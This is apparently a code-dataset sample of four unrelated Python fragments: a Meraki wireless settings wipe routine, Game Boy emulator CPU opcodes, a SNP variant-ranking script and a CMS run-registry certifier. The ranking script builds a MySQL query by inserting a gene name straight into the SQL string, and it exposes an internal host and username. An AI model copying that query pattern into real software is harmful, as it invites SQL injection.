if 'maxPower' in RFP['twoFourGhzSettings'] and RFP['twoFourGhzSettings']['maxPower'] < 5:
RFP['twoFourGhzSettings']['maxPower'] = 5
#Wierd use-case where it'll break when you update via API
if 'validAutoChannels' in RFP['twoFourGhzSettings'] and RFP['twoFourGhzSettings']['validAutoChannels'] == [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11]:
RFP['twoFourGhzSettings']['validAutoChannels'] = [1,6,11]
if 'fiveGhzSettings' in RFP:
if 'minPower' in RFP['fiveGhzSettings'] and RFP['fiveGhzSettings']['minPower'] < 8:
RFP['fiveGhzSettings']['minPower'] = 8
if 'maxPower' in RFP['fiveGhzSettings'] and RFP['fiveGhzSettings']['maxPower'] < 8:
RFP['fiveGhzSettings']['maxPower'] = 8
return RFP
#returns object in list where "name" matches <name>
def find_fromName(self, listDicts, name):
for ld in listDicts:
if ld['name'] == name:
return ld #ld['groupPolicyId']
return None
#returns object in list where "name" matches <name>
def find_fromGPID(self, listDicts, gpid):
for ld in listDicts:
if 'groupPolicyId' in ld and ld['groupPolicyId'] == gpid:
return ld
return None
#Wipes SSIDs to default
def wipeALL(self):
if not self.WRITE:
print(f'{bc.FAIL}ERROR, this network does not have the WRITE flag set{bc.ENDC}')
return
self.CLEAN = False
count = 0
print(f'{bc.FAIL}Wiping network wireless settings Net[{bc.Blink}{self.name}{bc.ENDC}]')
#wipe all the SSIDs
while count < 15:
if self.WRITE: self.db.wireless.updateNetworkWirelessSsid(self.net_id, count, name="Unconfigured SSID "+str(count+1), enabled=False, authMode="open", ipAssignmentMode="NAT mode", minBitrate="1", bandSelection="Dual band operation", perClientBandwidthLimitUp="0", perClientBandwidthLimitDown="0", perSsidBandwidthLimitUp="0", perSsidBandwidthLimitDown="0", mandatoryDhcpEnabled=False, visible=True, availableOnAllAps= True, availabilityTags=[], useVlanTagging=False)
count += 1
#wipe all the RF profiles
#current = self.db.wireless.getNetworkWirelessRfProfiles(self.net_id)
current = self.getNetworkWirelessRfProfiles
for rfp in current:
if self.WRITE: self.db.wireless.deleteNetworkWirelessRfProfile(self.net_id, rfp['id'])
#wipe all the iPSKs
for i in self.ssids_range:
#if i >= len(self.ssids_ipsk): continue #if there's 8 elements, index of 7 would be the 8th item. if i=8
temp_ipsks = self.ssids_ipsk[i]
if len(temp_ipsks) == 0: continue #No ipsk here... moving on
for ipsk in temp_ipsks:
if self.WRITE:
#try:
self.db.wireless.deleteNetworkWirelessSsidIdentityPsk(self.net_id,i,ipsk['id'])
#except:
# print(f'{bc.FAIL}ERROR: Cannot delete iPSK {ipsk["id"]}')
#wipe all L3
for i in self.ssids_range:
temp_l3fw = self.ssids_l3[i]
if len(temp_l3fw) == 2 and temp_l3fw['rules'][0]['policy'] == 'allow':
continue #if there are only two rules and the default-LAN is default ('allow') not clear default
if self.WRITE: self.db.wireless.updateNetworkWirelessSsidFirewallL3FirewallRules(self.net_id,i, rules = [], allowLanAccess = True)
#wipe all L7
for i in self.ssids_range:
temp_l7fw = self.ssids_l7[i]['rules']
if len(temp_l7fw) == 0:
continue
if self.WRITE: self.db.wireless.updateNetworkWirelessSsidFirewallL7FirewallRules(self.net_id,i, rules = [])
#Wipe Traffic shaping rules
defaultTS = {'trafficShapingEnabled': True, 'defaultRulesEnabled': True, 'rules': []}
for i in self.ssids_range:
temp_ts = self.ssids_ts[i]
if not self.compare(temp_ts, defaultTS):
if self.WRITE: self.db.wireless.updateNetworkWirelessSsidTrafficShapingRules(self.net_id,i, **defaultTS)
#WirelessSettings
if self.WRITE:
tmp_ws = {'meshingEnabled': False, 'ipv6BridgeEnabled': False, 'locationAnalyticsEnabled': False, 'ledLightsOn': True, 'upgradeStrategy': 'minimizeUpgradeTime'}
self.db.wireless.updateNetworkWirelessSettings(self.net_id, **tmp_ws)
#Bluetooth
if self.WRITE:
self.db.wireless.updateNetworkWirelessBluetoothSettings(self.net_id, **{'scanningEnabled': False, 'advertisingEnabled': False})
#Group-Policies
for t_gp in self.getNetworkGroupPolicies:
if self.WRITE:
print(f"Wiping GroupPolicyId['{t_gp['groupPolicyId']}']")
self.db.networks.deleteNetworkGroupPolicy(self.net_id, t_gp['groupPolicyId'])
print(f'{bc.OKGREEN}{bc.Blink}Done.{bc.ResetBlink} Wiped all SSIDs and RF-profiles{bc.ENDC}')
#WEBHOOKS
print(f'{bc.FAIL}Wiping network settings Net[{bc.Blink}{self.name}{bc.ENDC}]')
for wh in self.getNetworkWebhooksHttpServers:
if self.WRITE:
self.db.networks.deleteNetworkWebhooksHttpServer(self.net_id,wh['id'])
#ALERTS
cleared = self.getNetworkAlertsSettings
cleared['defaultDestinations'] = {'emails' : [], 'snmp' : False, 'allAdmins' : False, 'httpsServerIds' : []}
for c in cleared['alerts']:
if 'type' in c and 'enabled' in c:
c['enabled'] = False
| |
>> 8) & 0xff
lo = pc & 0xff
self.mmu.set_addr(self.sp-1, hi)
self.mmu.set_addr(self.sp-2, lo)
self.sp -= 2
self._in_interrupt = True
self.pc = 0x0040 + interrupt.value*8
self.interrupt_controller.acknowledge_interrupt(interrupt)
self.op_pc = self.pc
opcode = self.fetch()
self.opcode = opcode
# decode
if opcode == 0xcb:
cb_opcode = self.fetch()
self.cb_opcode = cb_opcode
op = self.cb_opcode_map[cb_opcode]
else:
op = self.opcode_map[opcode]
self.op = op
#self.log_regs()
#self.log_op()
if op is None:
raise ValueError('op {:#x} is None'.format(opcode))
if op.function is None:
raise ValueError('op.function for {} is None'.format(op))
# execute
try:
op.function()
except:
self.log_regs(self.logger.error)
self.log_op(self.logger.error)
raise
self.clock += op.cycles
for listener in self.clock_listeners:
listener.notify(self.clock, op.cycles)
return True
def go(self):
self.state = State.RUN
while self.state != State.STOP:
self.step()
print('Emulator shutdown')
def nop(self):
"""0x00"""
pass
def stop(self):
"""0x10"""
self.state = State.STOP
def halt(self):
"""0x76"""
self.state = State.HALT
def ld_imm8toreg8(self, reg8):
"""Returns a function to load an 8-bit immediate into :py:data:reg8.
:param reg8: single byte register
:rtype: integer → None """
def ld():
imm8 = self.fetch()
self.set_reg8(reg8, imm8)
return ld
def ld_reg8toreg8(self, src_reg8, dest_reg8):
"""Returns a function to load :py:data:src_reg8 into :py:data:dest_reg8.
:param src_reg8: single byte source register
:param dest_reg8: single byte destination register
:rtype: None → None """
def ld():
self.set_reg8(dest_reg8, self.get_reg8(src_reg8))
return ld
def ld_imm16toreg16(self, reg16):
"""Returns a function to load a 16-bit immediate into :py:data:reg16.
:param reg16: two-byte register
:rtype: integer → None """
def ld():
imm16 = self.fetch2()
self.set_reg16(reg16, imm16)
return ld
def ld_reg8toreg16addr(self, reg8, reg16):
"""Returns a function to load an 8-bit register value into an address
given by a 16-bit double register.
:param reg8: single byte source register
:param reg16: two-byte register containing destination address
:rtype: None → None"""
def ld():
self.mmu.set_addr(self.get_reg16(reg16), self.get_reg8(reg8))
return ld
def ld_reg8toreg16addr_inc(self, reg8, reg16):
"""Returns a function to load an 8-bit register value into an address
given by a 16-bit double register, then increment the address in the
dregister.
:param reg8: single byte source register
:param reg16: two-byte register containing destination address
:rtype: None → None"""
def ld():
self.mmu.set_addr(self.get_reg16(reg16), self.get_reg8(reg8))
self.set_reg16(reg16, self.get_reg16(reg16) + 1)
return ld
def ld_reg8toreg16addr_dec(self, reg8, reg16):
"""Returns a function to load an 8-bit register value into an address
given by a 16-bit double register, then decrement the address in the
dregister.
:param reg8: single byte source register
:param reg16: two-byte register containing destination address
:rtype: None → None"""
def ld():
addr = self.get_reg16(reg16)
self.mmu.set_addr(addr, self.get_reg8(reg8))
self.set_reg16(reg16, addr + 0xffff)
return ld
def ld_reg8toimm16addr(self, reg8):
"""Returns a function to load an 8-bit register value into an address
given by a 16-bit immediate.
:param reg8: single byte source register
:rtype: integer → None"""
def ld():
imm16 = self.fetch2()
self.mmu.set_addr(imm16, self.get_reg8(reg8))
return ld
def ld_reg16addrtoreg8(self, reg16, reg8, inc=False, dec=False):
"""Returns a function to load the value at an address given by a 16-bit
double register into an 8-bit register.
:param reg16: 16-bit double register containing the source address
:param reg8: 8-bit destination register
:param inc: increment the value in reg16 after the ld operation
:param dec: decrement the value in reg16 after the ld operation
:rtype: None → None"""
if inc and dec:
raise ValueError('only one of inc and dec may be true')
elif inc:
def ld():
u16 = self.get_reg16(reg16)
self.set_reg8(reg8, self.mmu.get_addr(u16))
self.set_reg16(reg16, u16 + 1)
elif dec:
def ld():
u16 = self.get_reg16(reg16)
self.set_reg8(reg8, self.mmu.get_addr(u16))
self.set_reg16(reg16, u16 + 0xffff)
else:
def ld():
u16 = self.get_reg16(reg16)
self.set_reg8(reg8, self.mmu.get_addr(u16))
return ld
def ld_reg16toreg16(self, src_reg16, dest_reg16):
def ld():
self.set_reg16(dest_reg16, self.get_reg16(src_reg16))
return ld
def ld_imm16addrtoreg8(self, reg8):
"""Returns a function to load the value at an address given by a 16-bit
immediate into an 8-bit register.
:param reg8: the single-byte destination register
:rtype: integer → None"""
def ld():
imm16 = self.fetch2()
self.set_reg8(reg8, self.mmu.get_addr(imm16))
return ld
def ld_sptoimm16addr(self):
"""Loads the most significant byte of the stack pointer into the address
given by :py:data:imm16 and the least significant byte of the SP into
:py:data:imm16+1.
:rtype: None"""
imm16 = self.fetch2()
self.mmu.set_addr(imm16, self.sp >> 8)
self.mmu.set_addr(imm16 + 1, self.sp & 0xff)
def ld_spimm8toregHL(self):
imm8 = self.fetch()
result = (self.sp & 0xff) + imm8
if (self.sp & 0x0f) + (imm8 & 0x0f) > 0xf:
self.set_halfcarry_flag()
else:
self.reset_halfcarry_flag()
if result > 0xff:
self.set_carry_flag()
else:
self.reset_carry_flag()
self.reset_zero_flag()
self.reset_sub_flag()
result += self.sp & 0xff00
self.set_reg16('hl', result)
def ld_sptoreg16addr(self, reg16):
"""Returns a function that loads the stack pointer into the 16-bit
register :py:data:reg16.
:param reg16: the destination double register
:rtype: None → None"""
def ld():
addr = self.get_reg16(reg16)
self.mmu.set_addr(addr, self.sp >> 8)
self.mmu.set_addr(addr + 1, self.sp & 0xff)
return ld
def ld_imm8toaddrHL(self):
"""0x36"""
imm8 = self.fetch()
addr16 = self.get_reg16('hl')
self.mmu.set_addr(addr16, imm8)
def ldh_regAtoaddr8(self):
"""0xe0 -- load regA to 0xff00+addr8
"""
addr8 = self.fetch()
self.mmu.set_addr(0xff00+addr8, self.get_reg8('a'))
def ldh_addr8toregA(self):
"""0xf0 -- load (0xff00+addr8) into regA
"""
addr8 = self.fetch()
self.set_reg8('a', self.mmu.get_addr(0xff00+addr8))
def ldh_regAtoaddrC(self):
"""0xe2 -- load regA to (0xff00+regC)
"""
self.mmu.set_addr(0xff00+self.get_reg8('c'), self.get_reg8('a'))
def ldh_addrCtoregA(self):
"""0xf2 -- load (0xff00+regC) to regA
"""
self.set_reg8('a', self.mmu.get_addr(0xff00+self.get_reg8('c')))
def inc_reg8(self, reg8):
"""Returns a function that increments :py:data:reg8.
:param reg8: the 8-bit register to increment
:rtype: None → None"""
def inc():
u8 = self.get_reg8(reg8)
result = u8 + 1
self.set_reg8(reg8, result & 0xff)
if result & 0xff == 0:
self.set_zero_flag()
else:
self.reset_zero_flag()
if u8 & 0x0f == 0xf:
self.set_halfcarry_flag()
else:
self.reset_halfcarry_flag()
self.reset_sub_flag()
return inc
def inc_reg16(self, reg16):
"""Returns a function that increments :py:data:reg16.
:param reg16: the double register to increment
:rtype: None → None"""
def inc():
u16 = self.get_reg16(reg16)
result = u16 + 1
self.set_reg16(reg16, result)
return inc
def dec_reg8(self, reg8):
"""Returns a function that decrements :py:data:reg8.
:param reg8: the 8-bit register to decrement
:rtype: None → None"""
def dec():
u8 = self.get_reg8(reg8)
result = u8 + 0xff
self.set_reg8(reg8, result)
if u8 & 0x0f == 0:
self.set_halfcarry_flag()
else:
self.reset_halfcarry_flag()
if (result & 0xff) == 0:
self.set_zero_flag()
else:
self.reset_zero_flag()
self.set_sub_flag()
return dec
def dec_reg16(self, reg16):
"""Returns a function that decrements :py:data:reg16.
:param reg16: the double register to decrement
:rtype: None → None"""
def dec():
u16 = self.get_reg16(reg16)
result = u16 + 0xffff
self.set_reg16(reg16, result)
return dec
def inc_addrHL(self):
"""Increments the value at the address in HL."""
addr16 = self.get_reg16('hl')
u8 = self.mmu.get_addr(addr16)
result = u8 + 1
if u8 & 0xf == 0xf:
self.set_halfcarry_flag()
else:
self.reset_halfcarry_flag()
if result & 0xff == 0:
self.set_zero_flag()
else:
self.reset_zero_flag()
self.reset_sub_flag()
self.mmu.set_addr(addr16, result & 0xff)
def dec_addrHL(self):
"""Decrements the value at the address in HL."""
addr16 = self.get_reg16('hl')
u8 = self.mmu.get_addr(addr16)
result = u8 + 0xff
if result & 0xff == 0:
self.set_zero_flag()
else:
self.reset_zero_flag()
if u8 & 0x0f == 0x0:
self.set_halfcarry_flag()
else:
self.reset_halfcarry_flag()
self.set_sub_flag()
self.mmu.set_addr(addr16, result & 0xff)
def add_reg16toregHL(self, reg16):
"""Returns a function that adds :py:data:reg16 to the double register
HL.
:param reg16: source double register
:rtype: None → None"""
def add():
x = self.get_reg16('hl')
y = self.get_reg16(reg16)
result = x + y
self.set_reg16('hl', result)
if ((x & 0xfff) + (y & 0xfff)) > 0xfff:
self.set_halfcarry_flag()
else:
self.reset_halfcarry_flag()
self.reset_sub_flag()
if result > 0xffff:
self.set_carry_flag()
else:
self.reset_carry_flag()
return add
def add_reg8toreg8(self, src_reg8, dest_reg8, carry=False):
"""Returns a function that adds the given two 8-bit registers.
dest_reg8 = dest_reg8 + src_reg8
:param src_reg8: source single-byte register
:param dest_reg8: destination single-byte register
:param carry: src_reg8 + dest_reg8 + 1
:rtype: None → None"""
def add():
src_u8 = self.get_reg8(src_reg8)
dest_u8 = self.get_reg8(dest_reg8)
if carry:
result = src_u8 + dest_u8 + self.get_carry_flag()
else:
result = src_u8 + dest_u8
self.set_reg8(dest_reg8, result)
if result & 0xff == 0:
self.set_zero_flag()
else:
self.reset_zero_flag()
if (dest_u8 & 0x0f) + (src_u8 & 0x0f) > 0x0f:
self.set_halfcarry_flag()
else:
self.reset_halfcarry_flag()
self.reset_sub_flag()
if result > 0xff:
self.set_carry_flag()
else:
self.reset_carry_flag()
return add
def add_imm8toreg8(self, reg8, carry=False):
"""Returns a function that adds the given two 8-bit registers.
reg8 = reg8 + imm8
:param reg8: destination single-byte register
:param carry: reg8 + imm8 + 1
:rtype: int → None"""
def add():
imm8 = self.fetch()
u8 = self.get_reg8(reg8)
if carry:
result = u8 + imm8 + self.get_carry_flag()
else:
result = u8 + imm8
self.set_reg8(reg8, result)
if result & 0xff == 0:
self.set_zero_flag()
else:
self.reset_zero_flag()
if (u8 & 0x0f) + (imm8 & 0x0f) > 0x0f:
self.set_halfcarry_flag()
else:
self.reset_halfcarry_flag()
| |
<gh_stars>1-10
#!/usr/bin/env python
import scipy as sp
import scipy.stats
import pprint
import argparse
import csv
import re
import os
import MySQLdb
try:
import xlsxwriter
import xlrd
writeXLS = True
print 'yes XLS module imported'
except:
writeXLS = False
print 'No XLS module imported'
### Note header
#[ 'Chr',
# 'Position',
# 'Reference',
# 'Alteration',
# 'Function(Refseq)',
# 'Gene(Refseq)',
# 'ExonicFunction(Refseq)',
# 'AminoAcidChange(Refseq)',
# 'Function(Ensembl)',
# 'Gene(Ensembl)',
# 'ExonicFunction(Ensembl)',
# 'AminoAcidChange(Ensembl)',
# 'Function(Known)',
# 'Gene(Known)',
# 'ExonicFunction(Known)',
# 'AminoAcidChange(Known)',
# 'dbsnpIdentifier',
# 'dbSNPfrequency',
# 'EurEVSFrequency',
# 'AfrEVSFrequency',
# 'TotalEVSFrequency',
# 'Eur1000GenomesFrequency',
# 'Afr1000GenomesFrequency',
# 'Amr1000GenomesFrequency',
# 'Asia1000GenomesFrequency',
# 'Total1000GenomesFrequency',
# 'SugMentDup',
# 'PlacentalMammalPhyloP',
# 'PrimatesPhyloP',
# 'VertebratesPhyloP',
# 'PlacentalMammalPhastCons',
# 'PrimatesPhastCons',
# 'VertebratesPhastCons',
# 'Score1GERP++',
# 'Score2GERP++',
# 'SIFTScore',
# 'polyphen2',
# 'MutAss',
# 'Condel',
# 'samples(sampleid>zygosity>Cov>AF)']
###
def main ():
sub_pp = pprint.PrettyPrinter(indent = 4)
parser = argparse.ArgumentParser(description = 'rank SNPs according to their mutation properties')
parser.add_argument('--infile', type=argparse.FileType('r'), dest='infile', required=True, help='comma separated list of SNPs annotated with mutation impact data. [required]')
parser.add_argument('--outfile', type=argparse.FileType('w+'), dest='outfile', required=True, help='comma separated list of SNPs annotated with ranks. [required]')
args = parser.parse_args()
alldata = list(csv.reader(args.infile))
header = alldata.pop(0)
header_dict = dict(zip(header,range(len(header))))
index_varfunction = header_dict.get('ExonicFunction(Refseq)','NA')#identifycolumns(header, 'ExonicFunction(Refseq)')
index_genicfunction = header_dict.get('Function(Refseq)','NA')#identifycolumns(header, 'Function(Refseq)')
index_allele_freq = header_dict.get('AlleleFrequency','NA')
#alldata_clean = [ line for line in alldata if not line[index_varfunction] == 'synonymous SNV' ]
alldata_transpose = zip(*alldata)
values2investigate = ['Total1000GenomesFrequency', 'TotalEVSFrequency', 'SegMentDup', 'Condel', 'VertebratesPhyloP', 'VertebratesPhastCons', 'Cadd2', 'SIFTScore']
## This one is to produce a rank-filter by Allele Frequency with a sample tool
while True: # Allele frequency filtering
print('The allele Frequency filtering with tukey window for data input between 0-1')
AF_data = alldata_transpose[index_allele_freq]
#AF_data = sp.linspace(0,1-0.05,20).tolist()
AF_data = [0,00.05,0.10,0.15,0.20,0.25,0.30,0.35,0.40,0.45,0.50,0.55,0.60,0.65,0.70,0.75,0.80,0.85,0.90,0.95,1.00]
AF_filter = [tukeywin(x,0.85) for x in AF_data]
#print AF_data
sub_pp.pprint( zip(AF_data ,AF_filter))
break
# binning, because otherwise subtle differences get too much weight
print('binning')
while True:
#binned_values = binning(alldata_transpose, header, 'MAF')
_1000G =sp.array([0 if x == 'NA' else x for x in alldata_transpose[header_dict.get(values2investigate[0])]],dtype=sp.float32)
_EVS_Freq =sp.array([0 if x == 'NA' else x for x in alldata_transpose[header_dict.get(values2investigate[1])]],dtype=sp.float32)
MAF = (0.5*_1000G+0.5*_EVS_Freq).tolist()
binned_values = bin_list(MAF)
ranked_maf = (binned_values)
#print binned_values
#binned_values = binning(alldata_transpose, header, 'segdup')
binned_values = bin_list(alldata_transpose[header_dict.get(values2investigate[2])])
ranked_segdup = (binned_values)
#print binned_values
#binned_values = binning(alldata_transpose, header, 'condel')
binned_values = bin_list(alldata_transpose[header_dict.get(values2investigate[3])],None,None,True)
ranked_condel = (binned_values)
#print binned_values
#binned_values = binning(alldata_transpose, header, 'PhyloP')
binned_values = bin_list(alldata_transpose[header_dict.get(values2investigate[4])],None,None,True)
ranked_phylop = (binned_values)
#print binned_values
#binned_values = binning(alldata_transpose, header, 'PhastCons')
binned_values = bin_list(alldata_transpose[header_dict.get(values2investigate[5])])
ranked_phastcons = (binned_values)
#print binned_values
#binned_values = binning(alldata_transpose, header, 'Cadd2')
binned_values = bin_list(alldata_transpose[header_dict.get(values2investigate[6])])
ranked_cadd = binned_values
#print binned_values
#sub_pp.pprint(binned_values)
#exit(0)
break
print('Rank product ')
# calculate rank product
rank_product_list = list()
max_maf_rank = max(ranked_maf)
max_segdup_rank = max(ranked_segdup)
max_condel_rank = max(ranked_condel)
max_phastcons_rank = max(ranked_phastcons)
max_cadd_rank = max(ranked_cadd)
div_factor = 100**4
for i in range( len(binned_values) ):
# skip synonymous variants
if ( alldata[i][index_varfunction] == 'synonymous SNV' or alldata[i][index_varfunction] == 'NA' ) and not alldata[i][index_genicfunction] == 'splicing':
# synonymous SNVs get the maximum rank and are downgraded by that
rank_product = float( ( max_maf_rank * max_segdup_rank * max_condel_rank * max_phastcons_rank * max_cadd_rank ) ) / ( div_factor)
else:
rank_product = float( ranked_maf[i] * ranked_segdup[i] * ranked_condel[i] * ranked_phastcons[i] * ranked_cadd[i] ) / ( div_factor ) # 4 tools deliver information, decrease the numeric value to more graspable values ### currently deleted * ranked_phylop[i]
rank_product_list.append(rank_product)
# all rank products get a rank for more facile overview
rankrank = scipy.stats.rankdata(rank_product_list)
rank_idx = sp.argsort(rank_product_list)
outcsv = csv.writer(args.outfile)
header.append('rank') #,'maf','segdup','condel','condelbin','phastcons','product'])
outcsv.writerow(header)
for i in rank_idx:
tmp = alldata[i]
tmp.append(int(sp.ceil(100*rank_product_list[i])))
outcsv.writerow(tmp)
##############################################
# MEDIAN FILTERING
all_ranked_array = sp.matrix([ranked_maf,ranked_segdup,ranked_condel,ranked_cadd,ranked_phastcons])
mean_rank = sp.mean(all_ranked_array,axis=0)
#sub_pp.pprint(mean_rank)
median_rank = [sp.median(all_ranked_array[:,i].T.tolist()) for i in range(len(ranked_maf))]
##############################################
print('Database search for OMIM values for a subset of variants')
db_search(alldata_transpose[6],alldata_transpose[0],alldata_transpose[1],alldata_transpose[2],alldata_transpose[3])
#excel writing
### write an xls output by reading the existing output file if it exists
### so that we can then add a new worksheet
print('Excel writing')
if writeXLS == True:
# open output file for re-reading
excel_name = args.outfile.name + ".xlsx"
tmp_name = 'tmp.xlsx'
# open xls file for writing
xls = xlsxwriter.Workbook(tmp_name)
worksheet = xls.add_worksheet('ediva_filtered3')
row = 0
args.outfile.seek(0)
# read line by line and transform to xls
for line in args.outfile:
#line.rstrip('\n')
data = line.split(',')
worksheet.write_row(row, 0, data)
row += 1
#check if already exist
with open(excel_name,'r') as old_excel:
workbook_rd = xlrd.open_workbook(excel_name)
worksheets = workbook_rd.sheet_names()
for worksheet_name in worksheets:
try:
worksheet_rd = workbook_rd.sheet_by_name(worksheet_name)
worksheet_wr = xls.add_worksheet(worksheet_name)
num_rows = worksheet_rd.nrows - 1
curr_row = -1
while curr_row < num_rows:
curr_row += 1
row_content = worksheet_rd.row(curr_row)
row_content_values = [x.value for x in row_content]
worksheet_wr.write_row(curr_row, 0, row_content_values)
#print row
except:
print "There was a problem in passing the %s data. \nIt may be because the sheet was already there before"%(worksheet_name)
xls.close()
os.remove(excel_name)
os.rename(tmp_name, excel_name)
return #exit(0)
def rank (binned_list):
# rank returns values from 1 to 100
rank_list = list()
for i in range( len(binned_list) ):
rankvalue = binned_list[i] % 101 + 1 # 101, because otherwise 0 and 100 % 100 calculates to 0
rank_list.append(rankvalue)
#rank_list = scipy.stats.rankdata(binned_list) # this does produce the wrong order
return(rank_list)
def bin_list(in_list,th_1=None,th_2=None,invert=False,n_bins=100):
""" I want to build a function that takes in:
- list : of floats and takes care of 'NA'
- th_1 : small threshold: all values <= th_1 are assigned value 1
- th_2 : high threshold : all values >= th_2 are assigned value 100
- invert:decide if the input list must be inverted in terms of output values 1-100 -> 100-1
- n_bins =100: number of total available scores
- The output must be an associated integer value 1-100 for each input list_element
"""
sub_pp = pprint.PrettyPrinter(indent = 4)
#First of all take care of NA values by the mean array_value
n_bins_0 = n_bins
offset = 1
in_array = sp.array(in_list)
in_array[in_array=='NA'] = sp.nan
in_array = in_array.astype(sp.float32)
in_mean = scipy.stats.nanmean(in_array)
nan_idx = sp.where(sp.isnan(in_array))
in_array[nan_idx] = in_mean
out_array = sp.zeros(len(in_list))
#Generate a sorted_list of the values between the thresholds:
temp_array = in_array
if th_1 != None:
n_bins -= 1
offset += 1
th_1_indexes = sp.where(in_array<= th_1)
out_array[th_1_indexes] = 1
temp_array[th_1_indexes] = sp.nan
if th_2 != None:
n_bins -= 1
th_2_indexes = sp.where(in_array>=th_2)
out_array[th_2_indexes] = n_bins
temp_array[th_2_indexes] = sp.nan
#Establish the number of element per bin
#temp_array.astype(sp.float32)
num_elements_within_threshold = len(temp_array[~sp.isnan(temp_array)])
#important check if the elements are more than n_bins
if num_elements_within_threshold<n_bins:
n_bins = num_elements_within_threshold
print "WARNING: the elements within thresholds are less than the number of bins"
print "WARNING: Set the within_threshold bin number to %d"%n_bins
num_el_per_bin = int(sp.floor(num_elements_within_threshold/float(n_bins)))
#print '\n num_within:%d'%num_elements_within_threshold
#print 'num bins :%d'%n_bins
#print 'n_per_bin :%d'%num_el_per_bin
#print 'offset : %d'%offset
sort_indices = sp.argsort(temp_array)
sort_indices = sort_indices[0:num_elements_within_threshold]
sorted_val = sp.sort(temp_array)
#build the max_value_per_bin
max_per_bin = sp.zeros(n_bins)
for i in range(n_bins):
index = int(sp.floor((i+1)*num_elements_within_threshold/float(n_bins) ))
max_per_bin[i] = sorted_val[index-1]
for i in range(len(temp_array)):
if ~sp.isnan(temp_array[i]):
for bin_i in range(n_bins):
if temp_array[i] <= max_per_bin[bin_i]:
out_array[i] = offset + bin_i
break
#bin_values = offset+sp.floor(sp.linspace(0,num_elements_within_threshold-1,num_elements_within_threshold)/float(num_el_per_bin))
#out_array = out_array[sort_indices.astype(int).tolist()] = bin_values
#Manage the case of inverted values
if invert:
out_array = n_bins_0 + 1 - out_array
out_array = out_array.astype(int)
out_array = [min(n_bins_0,x)for x in out_array]
#aa = [out_array.count(x) for x in range(1,n_bins_0+1)]
##sub_pp.pprint(out_array)
#dd = dict(zip(range(1,n_bins_0+1),aa))
#sub_pp.pprint(dd)
#print(sum(aa))
#print '----------------------------\n\n'
return out_array#.astype(int).tolist()
def db_search(variant_list,chr_,pos,ref,alt):
''' Function to search in the edivaweb database the omim links for each of the ranked variants
And then store the result in a new table.
It's a test to see wether we can get the data from that database or not'''
outStr = dict()
## DB parameters
username = "rrahman"
database = "eDiVa_scratch"
dbhost = "mysqlsrv-ediva.linux.crg.es"
passw = "<PASSWORD>"
db = MySQLdb.connect(host=dbhost, # your host, usually localhost
user=username, # your username
passwd=<PASSWORD>w)#, # your password
#db=database) # name of the data base
cur = db.cursor()
for i in range(10):#len(variant_list)):
gene_name = variant_list[i]
sql = ("SELECT gene_name , title_mim_number ,details_mim_number "+
"FROM eDiVa_scratch.Table_gene2mim, eDiVa_scratch.Table_omim "+
"where eDiVa_scratch.Table_gene2mim.mim_number = eDiVa_scratch.Table_omim.mim_number "+
"and eDiVa_scratch.Table_gene2mim.gene_name ='%s';"%gene_name)
#sql = "select chr,pos,lengthofrepeat,copyNum,region from ediva_public_omics.Table_simpleRepeat;"
cur.execute(sql)
count = 0
omim_disease =""
omim_2 = ""
for row in cur:
count | |
#! /usr/bin/env python
################################################################################
#
#
# $Author: smaruyam $
# $Date: 2012/12/14 17:02:45 $
# $Revision: 1.15 $ 18.06.2015 $
#
#
# <NAME> = <EMAIL>
# <NAME> = <EMAIL>
# <NAME> = <EMAIL>
#
################################################################################
import re, json, sys, ConfigParser, os, string, commands, time, socket
from rrapi import RRApi, RRApiError
class Certifier():
cfg='runreg.cfg'
OnlineRX = "%Online%ALL"
EXCL_LS_BITS = ('jetmet','muon','egamma')
EXCL_RUN_BITS = ('all')
def __init__(self,argv,verbose=False):
self.verbose = verbose
if len(argv)==2:
self.cfg = argv[1]
else:
self.cfg = Certifier.cfg
self.qry = {}
self.qry.setdefault("GOOD", "isNull OR = true")
self.qry.setdefault("BAD", " = false")
self.readConfig()
def readConfig(self):
CONFIG = ConfigParser.ConfigParser()
if self.verbose:
print 'Reading configuration file from %s' % self.cfg
CONFIG.read(self.cfg)
cfglist = CONFIG.items('Common')
self.dataset = CONFIG.get('Common','DATASET')
self.group = CONFIG.get('Common','GROUP')
self.address = CONFIG.get('Common','RUNREG')
self.runmin = CONFIG.get('Common','RUNMIN')
self.runmax = CONFIG.get('Common','RUNMAX')
self.runlist = ""
for item in cfglist:
if "RUNLIST" in item[0].upper():
self.runlist = item[1].split(" ")
self.qflist = CONFIG.get('Common','QFLAGS').split(',')
self.bfield_thr = '-0.1'
self.bfield_min = '-0.1'
self.bfield_max = '4.1'
self.injection = "%"
self.dcslist = CONFIG.get('Common','DCS').split(',')
self.jsonfile = CONFIG.get('Common','JSONFILE')
self.beamene = []
self.dbs_pds_all = ""
self.online_cfg = "FALSE"
self.usedbs = False
self.useDAS = False
self.dsstate = ""
self.useDBScache = "False"
self.useBeamPresent = "False"
self.useBeamStable = "False"
self.cacheFiles = []
self.predefinedPD = ["/Commissioning/Run2015A-v1/RAW","/ZeroBias/Run2015B-v1/RAW"]
self.component = []
self.nolowpu = "True"
print "First run ", self.runmin
print "Last run ", self.runmax
if len(self.runlist)>0:
print "List of runs ", self.runlist, " (",len(self.runlist), " runs)"
print "Dataset name ", self.dataset
print "Group name ", self.group
print "Quality flags ", self.qflist
print "DCS flags ", self.dcslist
for item in cfglist:
if "INJECTION" in item[0].upper():
self.injection = item[1]
if "BFIELD_THR" in item[0].upper():
self.bfield_thr = item[1]
if "BFIELD_MIN" in item[0].upper():
self.bfield_min = item[1]
if "BFIELD_MAX" in item[0].upper():
self.bfield_max = item[1]
if "BEAM_ENE" in item[0].upper():
self.beamene = item[1].split(',')
if "DBS_PDS" in item[0].upper():
self.dbs_pds_all = item[1]
self.usedbs = True
if "USE_DAS" in item[0].upper():
self.useDAS = item[1]
if "ONLINE" in item[0].upper():
self.online_cfg = item[1]
if "DSSTATE" in item[0].upper():
self.dsstate = item[1]
if "DBSCACHE" in item[0].upper():
self.useDBScache = item[1]
if "BEAMPRESENT" in item[0].upper():
self.useBeamPresent = item[1]
print 'Use Beam Present Flag', self.useBeamPresent
if "BEAMSTABLE" in item[0].upper():
self.useBeamStable = item[1]
print 'Use Beam Stable Flag', self.useBeamStable
if "CACHEFILE" in item[0].upper():
self.cacheFiles = item[1].split(',')
if "COMPONENT" in item[0].upper():
self.component = item[1].split(',')
print 'COMPONENT ', self.component
if "NOLOWPU" in item[0].upper():
self.nolowpu = item[1]
print 'NoLowPU', self.nolowpu
self.dbs_pds = self.dbs_pds_all.split(",")
print "Injection schema ", self.injection
